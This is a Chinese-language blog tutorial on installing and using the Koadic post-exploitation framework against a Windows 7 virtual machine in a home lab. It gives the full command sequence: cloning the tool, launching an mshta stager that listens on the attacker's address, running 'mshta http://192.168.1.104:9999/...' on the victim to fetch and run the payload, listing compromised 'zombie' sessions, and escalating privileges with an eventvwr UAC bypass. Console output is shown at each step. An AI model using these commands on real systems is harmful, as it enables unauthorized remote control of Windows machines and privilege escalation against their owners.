Koadic的安装和使用

作者: bboysoul | 来源:发表于2017-11-26 11:02 被阅读77次

    概述

    Koadic是DEFCON分型出来的一个后渗透工具,主要通过vbscript、jscript进行大部分操作
    废话不多说开始演示

    环境准备

    我准备的是两台虚拟机一台kali就是攻击机器
    一台windows7 64位就是受害者了

    安装

    安装很简单
    git clone https://github.com/zerosum0x0/koadic.git
    之后安装依赖
    cd koadic/
    pip install -r requirements.txt

    使用

    运行
    ./koadic

                                .
                               / \
         _                   _ | |
        | | _____   __ _  __| || |  ___
        | |/ / _ \ / _` |/ _` ||.| / __|
        |   / (o) | (_| | (_| ||.|| (__
        |_|\_\_^_/ \__,_|\__,_||:| \___|
                               |:|
                            ~\==8==/~
                                8
                                O
    
            -{ COM Command & Control }-
          Windows Post-Exploitation Tools
                 Endless Intellect
    
                ~[ Version:  0x8 ]~
                ~[ Stagers:    4 ]~
                ~[ Implants:  29 ]~
    
    (koadic: sta/js/mshta)# 
    

    首先我们得知道这个工具的几个概念

    • Stagers 就是在你攻击的机器上生成的payload的种类
    • Implants 就是当你控制机器后可以进行的操作

    具体Stagers和Implants你可以看它的github页面
    https://github.com/zerosum0x0/koadic

    接着我们执行
    use stager/js/mshta
    就是使用mshta这个stager
    之后设置本机的端口和ip,进行本地监听
    你可以输入info命令来查看要设置的参数
    set LHOST 192.168.1.104
    set LPORT 9999
    接着运行
    run

    (koadic: sta/js/mshta)# run
    [+] Spawned a stager at http://192.168.1.104:9999/BYhBU
    [>] mshta http://192.168.1.104:9999/BYhBU
    

    因为是后渗透工具,所以不管怎么说你肯定能在你控制的电脑上执行一条命令
    在受害者机器上执行
    mshta http://192.168.1.104:9999/BYhBU
    我的话直接打开一个cmd执行就好了
    接着会有一个python字符的坑,会出现下面这个错

    (koadic: sta/js/mshta)# ----------------------------------------
    Exception happened during processing of request from ('192.168.1.110', 49159)
    Traceback (most recent call last):
      File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
        self.finish_request(request, client_address)
      File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
        self.RequestHandlerClass(request, client_address, self)
      File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
        self.handle()
      File "/root/koadic/core/handler.py", line 90, in handle
        return BaseHTTPRequestHandler.handle(self)
      File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
        self.handle_one_request()
      File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
        method()
      File "/root/koadic/core/handler.py", line 169, in do_POST
        self.session.parse_user_info(data)
      File "/root/koadic/core/session.py", line 56, in parse_user_info
        data = data.decode().split("~~~")
    UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
    ----------------------------------------
    [!] Zombie 0: Timed out.
    

    就是下面这个错误
    UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
    你只要把字符编码换成utf-8就好了
    怎么做呢看下面
    首先退出程序
    打开下面这个文件
    vim koadic

    添加上

    import sys
    reload(sys)
    sys.setdefaultencoding('utf-8')
    

    总的文件是下面这个样子的

    #!/usr/bin/env python
    
    import sys
    reload(sys)
    sys.setdefaultencoding('utf-8')
    # Copyright (c) 2016 - 2017 RiskSense, Inc.
    #
    # Licensed under the Apache License, Version 2.0 (the "License"); you may not
    # use the software except in compliance with the License.
    #
    # You may obtain a copy of the License at:
    #
    #    http://www.apache.org/licenses/LICENSE-2.0
    #
    # Unless required by applicable law or agreed to in writing, software
    # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
    # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
    # License for the specific language governing permissions and limitations under
    # the License.
    
    # Disclaimer:
    # Usage of Koadic for attacking targets without prior mutual consent is illegal.
    # It is the end user's responsibility to obey all applicable local, state,
    # federal, and international laws. Developers assume no liability and are not
    # responsible for any misuse or damage caused by this program.
    
    __version_info__ = (0, 8)
    __version__ = "x".join(map(str, __version_info__))
    __license__ = "Apache 2.0"
    __credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"]
    
    if __name__ == "__main__":
        import core.shell
    
        banner = open("data/banner.txt", "rb").read().decode("unicode_escape")
    
        shell = core.shell.Shell(banner, __version__)
        shell.run()
    

    之后重新进行上面的操作就不会报错了

                                .
                               / \
         _                   _ | |
        | | _____   __ _  __| || |  ___
        | |/ / _ \ / _` |/ _` ||.| / __|
        |   / (o) | (_| | (_| ||.|| (__
        |_|\_\_^_/ \__,_|\__,_||:| \___|
                               |:|
                            ~\==8==/~
                                8
                                O
    
            -{ COM Command & Control }-
          Windows Post-Exploitation Tools
                 Endless Intellect
    
                ~[ Version:  0x8 ]~
                ~[ Stagers:    4 ]~
                ~[ Implants:  29 ]~
    
    (koadic: sta/js/mshta)# use stager/js/mshta 
    (koadic: sta/js/mshta)# set LHOST 192.168.1.104
    [+] LHOST => 192.168.1.104
    (koadic: sta/js/mshta)# run
    [+] Spawned a stager at http://192.168.1.104:9999/N435X
    [>] mshta http://192.168.1.104:9999/N435X
    [+] Zombie 0: Staging new connection (192.168.1.110)
    [+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 
    (koadic: sta/js/mshta)#
    

    之后我们进行权限提升也就是uac bypass

    输入zombies来查看我们控制的机器

    (koadic: sta/js/mshta)# zombies 
    
        ID   IP              STATUS  LAST SEEN       
        ---  ---------       ------- ------------    
        0    192.168.1.110   Alive   2017-11-25 21:27:46
    
    Use "zombies ID" for detailed information about a session.
    

    输入zombies 0可以查看这台机器的详细信息

    (koadic: sta/js/mshta)# zombies 0
    
        ID:                     0                               
        Status:                 Alive                           
        Last Seen:              2017-11-25 21:28:42             
    
        IP:                     192.168.1.110                   
        User:                   WIN-HK90RUM6L1B\bboysoul        
        Hostname:               WIN-HK90RUM6L1B                 
        Primary DC:             Unknown                         
        OS:                     Microsoft Windows 7 专业版         
        OSArch:                 64-bit                          
        Elevated:               No                              
    
        User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
        Session Key:            f4d7735b8a9d45a5a74ed5a63a164421
    
        JOB  NAME                            STATUS  ERRNO   
        ---- ---------                       ------- ------- 
    

    可以看到Elevated这里显示no表示我们没有进行提权
    输入
    use implant/elevate/bypassuac_eventvwr
    查看一下这个模块的信息

    (koadic: imp/ele/bypassuac_eventvwr)# info
    
        NAME        VALUE           REQ     DESCRIPTION     
        -----       ------------    ----    -------------   
        PAYLOAD                     yes     run payloads for a list
        ZOMBIE      ALL             yes     the zombie to target
    

    这里我们把payload和zombie设置为0,就是表示payload为0不使用,zombie的编号为0
    接着run就好了

    (koadic: imp/ele/bypassuac_eventvwr)# run
    [*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created.
    [+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed.
    [+] Zombie 1: Staging new connection (192.168.1.110)
    [+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版 
    

    成功
    但是注意的是程序新建立了一个链接来bypass所以原来那个zombie连接虽然存在但是还是没有进行提权的用户,新建的那个连接才是进行提权过的用户,不信输入zombie看一下是不是多出了一个链接

    
    (koadic: imp/ele/bypassuac_eventvwr)# zombies 
    
        ID   IP              STATUS  LAST SEEN       
        ---  ---------       ------- ------------    
        0    192.168.1.110   Alive   2017-11-25 21:43:00
        1*   192.168.1.110   Alive   2017-11-25 21:43:00
    
    Use "zombies ID" for detailed information about a session.
    

    看一下zombie 1的信息

    (koadic: imp/ele/bypassuac_eventvwr)# zombies 1
    
        ID:                     1                               
        Status:                 Alive                           
        Last Seen:              2017-11-25 21:45:35             
    
        IP:                     192.168.1.110                   
        User:                   WIN-HK90RUM6L1B\bboysoul*       
        Hostname:               WIN-HK90RUM6L1B                 
        Primary DC:             Unknown                         
        OS:                     Microsoft Windows 7 专业版         
        OSArch:                 64-bit                          
        Elevated:               YES!                            
    
        User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
        Session Key:            c42dec18786a47f2bc4ee023dc8f69bd
    
        JOB  NAME                            STATUS  ERRNO   
        ---- ---------                       ------- ------- 
    

    是提权成功的
    提权成功之后的机器我们可以使用implant里所有的模块,具体的模块自己研究吧

    欢迎关注Bboysoul的博客www.bboysoul.com
    Have Fun

    相关文章

      网友评论

        本文标题:Koadic的安装和使用

        本文链接:https://www.haomeiwen.com/subject/hpqkbxtx.html